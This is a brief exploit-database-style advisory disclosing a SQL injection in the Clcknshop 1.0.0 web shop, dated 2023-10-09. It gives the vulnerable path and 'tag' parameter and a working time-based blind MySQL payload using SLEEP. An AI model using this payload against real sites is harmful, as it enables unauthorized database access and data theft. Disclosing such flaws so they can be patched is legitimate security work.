Exploits / Vulnerability Discovered : 2023-10-09 |
Type : webapps |
Platform : php
This exploit / vulnerability Clcknshop 1.0.0 sql injection is for educational purposes only and if it is used you will do on your own risk!
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /collection/all
GET parameter 'tag' is vulnerable to SQL Injection
https://website/collection/all?tag=[SQLi]
---
Parameter: tag (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
---